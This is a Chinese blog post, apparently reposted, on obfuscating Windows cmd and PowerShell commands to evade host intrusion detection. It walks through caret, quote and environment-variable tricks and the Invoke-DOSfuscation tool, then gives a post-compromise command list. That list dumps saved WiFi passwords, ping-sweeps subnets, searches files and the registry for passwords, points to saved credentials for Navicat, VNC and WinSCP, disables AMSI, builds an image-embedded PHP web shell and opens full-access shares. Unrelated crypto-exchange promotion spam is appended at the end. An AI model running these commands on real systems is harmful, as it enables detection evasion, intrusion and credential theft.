浅谈命令混淆

前言

之前一位朋友提到,客服的hids设备执行whoami命令时会被检测到,无论是使用wh”o”aM^i还是cmd /c “,;((w^h^o^a^M^i))”,都无法逃避检测,于是向我求助。既然提到了这个问题,我在这里简单总结一下我自己的几种方法,但会的方法相对较少,后续会补充几个常用的cmd/powershell命令。

技巧(1)特殊符号/大小写

我们可以利用”双引号,^尖角号,括号,逗号,分号等符号来绕过一些常规检测。

浅谈命令混淆

也可以使用一些非主流的特殊字符串,例如certutil /⸿split -ur₏lcache -f https://www.php.cn/link/1171d78d0d618b225dfa50bc2ebb2399 axgg.txt

浅谈命令混淆

(2)环境变量

当我们获取一台机器后,可以先用set命令查看有哪些环境变量。

浅谈命令混淆

例如,%comspec:~3,1%hoa%comspec:~21,1%i,使用环境变量中的字母替换了w和m。

浅谈命令混淆

稍微解释一下,这里使用环境变量截取第三位和第二十一位的w和m来绕过检测。当然,我们也可以自己设置环境变量来达到绕过目的,例如set a=cmd /c whoami%a%。环境变量也可以与我们的特殊符号结合使用,”双引号,^尖角号,括号,逗号,分号等组合在一起,达到同样的效果,例如cmd /c “ set a1=ser&& set a2=ne&& set a3=t u&&call echo %a2%%a3%%a1%”^c^M^D, , , , /^c”, ,(, , , , , (s^et ^ w^3=i^pco) , )&& (S^Et ^ eH^P=n^fig)& , , C^aLl, sE^t GyHE=%w^3%%eH^P%& , , %LoCaLAPpdata:~ -3,+1%%pRoGramw6432:~9,1%d, ,/^R, , %Gy^HE%”

浅谈命令混淆

(3)for循环

单独使用for循环可能效果有限,但可以尝试。

for /f “tokens=4 delims=” %f in (“c:windowssystem32whoami”) do %f

这里,delims是以分割,tokens是第几次分割,我们的第四次分割就是whoami,然后打印。

浅谈命令混淆

(4)利用powershell

可以利用powershell的base64编码。

浅谈命令混淆

当然,还可以尝试fuzzing低版本的powershell,例如powershell -version 3/2/1。利用windows的api,例如Get-WmiObject -Class Win32_UserAccount,也可以使用前面的特殊符号和环境变量来绕过检测。

浅谈命令混淆

利用注册表,例如dir “Registry::HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers” -Name。

浅谈命令混淆

既然提到了powershell,这里简单提一下powershell的混淆思路,我直接截图,比较简陋。

腾讯混元 腾讯混元

腾讯混元大由腾讯研发的大语言模型,具备强大的中文创作能力、逻辑推理能力,以及可靠的任务执行能力。

腾讯混元 65 查看详情 腾讯混元

浅谈命令混淆

(5)运用工具

Dosfuscation

Invoke-DOSfuscation //启动

TUTORIAL //开启模块

SET COMMAND whoami //加密你想执行的命令

浅谈命令混淆

关于cmd/powershell平时会用到的一些命令

(1)主机信息

代码语言:javascript

代码运行次数:0

运行

复制

qwinsta                                        //查看在线用户wmic logicaldisk where DriveType=3 get DeviceID                 //查看系统的盘符wmic useraccount get name,sid                                            //查看所有用户的sidcacls c:                                             //查看c盘的权限配额cacls c:windowsma.exe                 //查看ma.exe的权限配置icacls C:Windows                            //查看文件的ACL情况nbtstat -A 127.0.0.1                         //查看其他主机的bios名Get-WmiObject -class win32_product |Select-Object -Property name,version:收集主机的软件版本信息(Get-ItemProperty -Path "Registry::HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers192.168.149.135").UsernameHint     //本机哪个用户登陆了此IPGet-WinEvent -FilterHashtable @{logname="Application";}      查看application日志Get-CimInstance Win32_DCOMApplication      //查看DCOM文件

(2)横向信息

代码语言:javascript

代码运行次数:0

运行

复制

netsh wlan show profile                 //查看连结过的wifinetsh wlan show profile WiFi-name key=clear 获取对应 wifi 的密码ie 代理                //对应wifi的密码for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do  @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear            //所有wifi密码for /l %i in (1,1,255) do @ping 172.16.0.%i -w 1 -n 1 | find “TTL=”                                    //windows自带的网段扫描for /l %a in (0,1,2) do cmd /c "choice /t 7 /d y /n >nul" & for /l %b in (1,1,255) do  start cmd /c  "ping 172.29.%a.%b -l 1 -n 1 -i 1 >172.29.%a.%b.txt"        //多线程版findstr  /s /m "password" *.*                                                  //查找当前目录的子目录的所有含有password的文件夹dir c:a.txt  /s /b                                                                  //查找c盘的a.txt        Get-Content (Get-PSReadlineOption).HistorySavePath                                //powershell命令历史记录,如果命令用不起,可以查看powershell的txt%userprofile%AppDataRoamingMicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt%appdata%MicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt注册表HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers                     这个为当前用户的mstsc的记录,username为用户名HKEY_CURRENT_USERSoftwareMicrosoftWindows ScriptSettingsAmsiEnable            禁用AMSI(需要高权限)HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers        MYSQLHKEY_CURRENT_USERSoftwarePremiumSoftNavicatMARIADBServers    MariaDBHKEY_CURRENT_USERSoftwarePremiumSoftNavicatMONGODBServers    MongoDBHKEY_CURRENT_USERSoftwarePremiumSoftNavicatMSSQLServers        Microsoft  SQLHKEY_CURRENT_USERSoftwarePremiumSoftNavicatOraServers        OracleHKEY_CURRENT_USERSoftwarePremiumSoftNavicatPGServers        PostgreSQLHKEY_CURRENT_USERSoftwarePremiumSoftNavicatSQLiteServers        SQLiteHKEY_LOCAL_MACHINESOFTWARERealVNCvncserver        RealVNCHKEY_CURRENT_USERSoftwareTightVNCServer  Value            //TightVNCHKEY_LOCAL_USERSoftwareTigerVNCWinVNC4        TigerVNCHKCUSoftwareMartin  PrikrylWinSCP 2Sessions        WinSCPreg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /s            //查看桌面目录reg query 计算机HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerTypedURLs            //查看浏览记录查找本机所有有关密码的字段reg query HKCU /f password /t REG_SZ /sreg query HKLM /f password /t REG_SZ /s

浅谈命令混淆

代码语言:javascript

代码运行次数:0

运行

复制

copy x.jpg/b+12.php 3.jpg                             //制作一句话iexpress                                                            //windows自带的解压命令makecab.exe                                                   //windows自带的压缩命令makecab 1.doc 1.zip                                    //压缩成啥看自己,zip,rar,cabexpand 1.zip 1.doc                                        //解压命令dir /b >>name.txt                                        //先把要解压的多个文件名写入txtmakecab /f name.txt /d maxdisksize=1024000                //然后压缩expand 1.cab -f:* c:test                                                //然后解压set http_proxy=http://127.0.0.1:1080                             //给cmd代理secpol.msc                                                  //打开本地安全策略taskkill /pid 1080 /f                                   //关闭进程copy *.txt 1.txt      type 1.txt                       //将该目录下的所有txt复制到1.txt,然后查看1.txtmstsc /admin /v:ip           mstsc /console /v:ip                        //远程连接certutil.exe -hashfile 1.txt                                            //计算文件hashattrib C:test.exe +s +h                                            //隐藏exe>>b.txt set/p="123" >追加下一个字符串自动换行,绕过/n的限制net share everyone=C:Windows /grant:everyone,full         //开启共享echo 123 > axgg::$INDEX_ALLOCATION                                  //文件流创建文件rd axgg::$INDEX_ALLOCATION                                                //删除改文件

后记

若文章有错误亦或者遗漏的技巧,还望各位师傅斧正和补充。

以上就是浅谈命令混淆的详细内容,更多请关注创想鸟其它相关文章!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/432466.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2025年11月7日 14:37:43
下一篇 2025年11月7日 14:38:46

相关推荐

  • 2025年币圈社交交易功能最佳的交易所排名TOP10盘点

    2025年币圈社交交易功能最佳的交易所包括OKX、Binance、Huobi等十大平台。1. OKX具备丰富的交易员选择和透明数据展示,操作人性化;2. Binance拥有庞大的交易员社区和完善的风险控制工具;3. Huobi注重社区氛围营造,提供多语言支持;4. Bybit专注于衍生品跟单,具备低…

    2025年12月8日 好文分享
    000
  • 欧易交易平台网址 欧易交易所官网地址

    欧易OKX是知名的数字资产交易平台之一,在全球范围内提供多种加密货币的交易服务。平台支持现货、合约、期权等多种交易类型,并提供丰富的金融衍生品工具。本文将为您详细介绍如何在欧易OKX平台完成注册流程。为了确保您访问的是官方网站,本文提供了直接跳转至欧易OKX官方首页的链接,建议您点击本文提供的链接进…

    2025年12月8日 好文分享
    000
  • 歐易安卓版app获取地址 歐易官方App安装教程

    欧易OKX作为全球知名的数字资产交易平台之一,致力于为用户提供安全、便捷、高效的交易服务。平台支持多种加密货币的交易,并提供丰富的金融工具和功能,满足不同用户的需求。为了帮助用户顺利获取并安装官方应用,本文特此提供官方应用下载链接。 欧易OKX官网: 获取官方应用 获取欧易OKX的官方应用是安全交易…

    2025年12月8日
    000
  • 安全正规的比特币交易所排名top10

    在全球%ignore_a_1%市场中,选择一个安全正规的比特币交易所至关重要。用户在进行交易时,资金安全和平台合规性是首要考量因素。以下将介绍当前市场上排名靠前的十家安全正规的比特币交易所,希望能为用户提供参考。 1. Binance 全球领先的加密货币交易所,提供广泛的交易对和衍生品。拥有强大的技…

    2025年12月8日 好文分享
    000
  • 歐易v6.127.0安卓版app获取地址 歐易最新版App安装入口

    欧易OKX,作为全球领先的数字资产交易平台之一,致力于为用户提供安全、稳定、高效的交易服务。平台拥有丰富的加密货币交易对,涵盖主流币种及各类新兴项目,满足不同投资者的交易需求。除了现货交易,欧易OKX还提供期货、期权、永续合约等多样化的衍生品工具,以及质押、借贷、DApp探索等金融服务。其App设计…

    2025年12月8日
    000
  • 欧意v6.127.0安卓版app获取地址 欧意最新版安卓App链接地址

    欧易(OKX)是一款全球知名的数字资产交易平台,致力于为用户提供安全、便捷、专业的加密货币交易服务。平台支持多种数字资产的买卖、存储和管理,拥有丰富的交易对和多种交易工具。本文将为您详细介绍如何获取欧意v6.127.0安卓版app,并提供官方app下载链接 欧易官网: 欧易最新版APP下载步骤 以下…

    2025年12月8日
    000
  • ​​山寨币季节预警!如何提前布局下一波爆发币种?

    随着比特币价格趋于稳定,市场资金开始寻找新的增长点,这往往是“山寨币季节”来临的前兆。本文将为你梳理出提前布局下一波潜在爆发币种的有效策略,帮助你抓住市场轮动的机遇。最后,市场永远充满不确定性,最重要的原则是“做好你自己的研究”(DYOR)。保持学习,保持耐心,当机会来临时,你才能从容应对。 一、什…

    2025年12月8日
    000
  • 以太坊跨链桥是什么?如何实现资产转移?

    区块链技术催生了众多独立的网络,如以太坊、币安智能链、polygon等。每个网络都有其独特的设计和协议。然而,这种独立性也带来了资产和信息难以在不同链之间自由流动的挑战。例如,以太坊上的erc-20代币无法直接在polygon网络上使用。为了解决这个隔离问题,跨链桥应运而生,成为连接不同区块链网络的…

    2025年12月8日
    000
  • 比特币正规交易所下载教程

    选择一个正规的比特币交易平台是数字资产交易的第一步,这关系到您的资金安全和交易体验。为了帮助您找到适合您的平台,我们整理了目前市场上一些备受信赖的比特币交易平台,并提供了关于如何找到其官方下载渠道的指导。这些平台普遍具备较高的安全性和良好的流动性,但您在做出选择前应仔细评估其特点和您的个人需求。 排…

    2025年12月8日 好文分享
    000
  • 比特币交易所官方最新版本 比特币交易平台最新版APP

    这是一款专为比特币及其他数字资产爱好者打造的专业、安全、稳定的交易平台应用。它聚合了全球主流市场的深度,提供了实时行情、闪电交易、专业的图表工具和便捷的资产管理功能,致力于为用户提供一流的数字资产交易体验。为了方便广大用户,本文将提供官方最新版app的下载渠道,点击下方的链接即可安全快速地下载官方正…

    2025年12月8日
    000
  • 狗狗币的创始人是谁?为什么后来退出了?

    binance币安交易所 注册入口: APP下载: 欧易OKX交易所 注册入口: APP下载: 火币交易所: 注册入口: APP下载: 狗狗币,一种以柴犬为标志的数字货币,其诞生源于互联网文化中的一个流行迷因(meme)。与许多追求技术革新或金融颠覆的加密货币不同,狗狗币在2013年底被创造出来时,…

    2025年12月8日
    000
  • 比特币交易平台APP最新版安装地址 比特币官网最新版本入口

    比特币交易平台app,致力于为广大用户提供安全、稳定、便捷的数字资产交易服务。通过该平台,您可以实时查看比特币等主流数字货币的行情动态,进行快速买卖交易,并利用丰富的图表工具进行市场分析。为了方便用户获取官方正版应用,本文将提供官方app的最新版下载链接,点击本文提供的下载链接即可下载,轻松开启您的…

    2025年12月8日
    000
  • 火币交易所app安卓版 火币交易所中文版安装包

    火币交易所是一款知名的数字资产交易平台,为全球用户提供广泛的加密货币交易及相关服务。这款官方安卓app中文版旨在为用户提供便捷、安全的移动交易体验。本文将为您提供官方的app下载链接,您可以点击本文提供的下载链接直接进行下载。 火币官网: 火币App中文版介绍 火币App支持多种加密货币的现货交易、…

    2025年12月8日
    000
  • 芝麻开门app安卓版 芝麻开门交易所中文版安装包

    芝麻开门gate.io是一款备受用户信赖的数字资产交易平台。它为全球用户提供比特币、以太坊、USDT等多种主流及新兴数字货币的交易服务。gate.io app功能全面,涵盖了币币交易、杠杆交易、合约交易、理财借贷等多种服务,致力于为用户提供安全、便捷、专业的交易体验。本文将为您提供官方app下载链接…

    2025年12月8日
    000
  • 币圈有哪些网站可以免费看行情 免费看行情的网站大全

    在波动剧烈的币圈市场,及时、准确地获取行情信息对于参与者来说至关重要。市场数据是做出决策的基础,无论是观察价格走势、分析交易量,还是了解市场情绪,都需要依赖可靠的数据源。幸运的是,当前市场上存在不少可以免费查看加密货币行情的平台和工具,它们为用户提供了便利的数据接口,让追踪市场动态不再是少数专业人士…

    2025年12月8日 好文分享
    000
  • Bi安交易所合约交易有风险吗?Bi安合约交易新手入门指南

    数字资产交易,尤其是在合约这样带有杠杆性质的领域,无疑是充满了机遇与挑战的。对于初入此道的朋友们来说,了解其内在机制,规避潜在风险,掌握实用的操作技巧,显得尤为重要。这不仅仅关乎资金的安全,更关乎能否在这个波动剧烈的市场中稳健前行,最终实现自己的目标。毕竟,任何高回报的背后,往往都伴随着同等甚至更高…

    2025年12月8日
    000
  • 如何注册币安交易所?2025最新网页版注册流程

    币安(Binance)作为一个全球性的数字资产%ignore_a_2%,为用户提供了丰富的交易产品和服务。想要进入这个平台进行操作,拥有一个属于自己的账户是必要的前提。这个过程涉及到一些关键的步骤和信息验证,以确保账户的安全和合规性。下面将详细介绍在币安官方网站上创建新账户的流程。 币安交易所202…

    2025年12月8日
    000
  • 稳定币交易所APP最新版本更新内容是什么

    稳定币交易所APP最新版本更新内容 数字资产交易平台持续优化其移动应用功能。近期,多个稳定币交易应用的最新版本进行了迭代更新,带来了用户体验和操作层面的改进。这些更新聚焦于提升稳定币的交易效率和资产管理的便捷性。 用户在使用这些平台进行稳定币相关操作时,可以通过官方渠道获取最新应用版本。 币安  欧…

    2025年12月8日
    000
  • 狗狗币交易所手机端App官网入口安装 2025十大官网网址大全

    探寻无需下载的免费加密货币行情网站入口,了解币圈免费行情分析平台官网地址,是众多投资者获取市场实时动态与分析信息的需求。许多平台提供通过网页浏览器直接访问的便捷服务,用户无需安装任何应用程序,只需打开官网页面,即可浏览各类数字资产的实时价格、历史k线图、交易量数据以及进行基础的技术指标分析。这种方式…

    2025年12月8日 好文分享
    000
  • 狗狗币怎么交易入口官方app 官网入口地址

    对于关注数字货币市场动态的用户来说,获取实时行情数据和进行基础分析是日常操作的一部分。许多平台提供这些服务,并且无需下载专门的手机应用程序,可以直接通过网页浏览器访问。这种方式尤其适合希望快速查看信息或不希望占用设备存储空间的用户。全球范围内有众多加密货币交易平台,它们通常在其官方网站上提供免费的行…

    2025年12月8日 好文分享
    000

发表回复

登录后才能评论
关注微信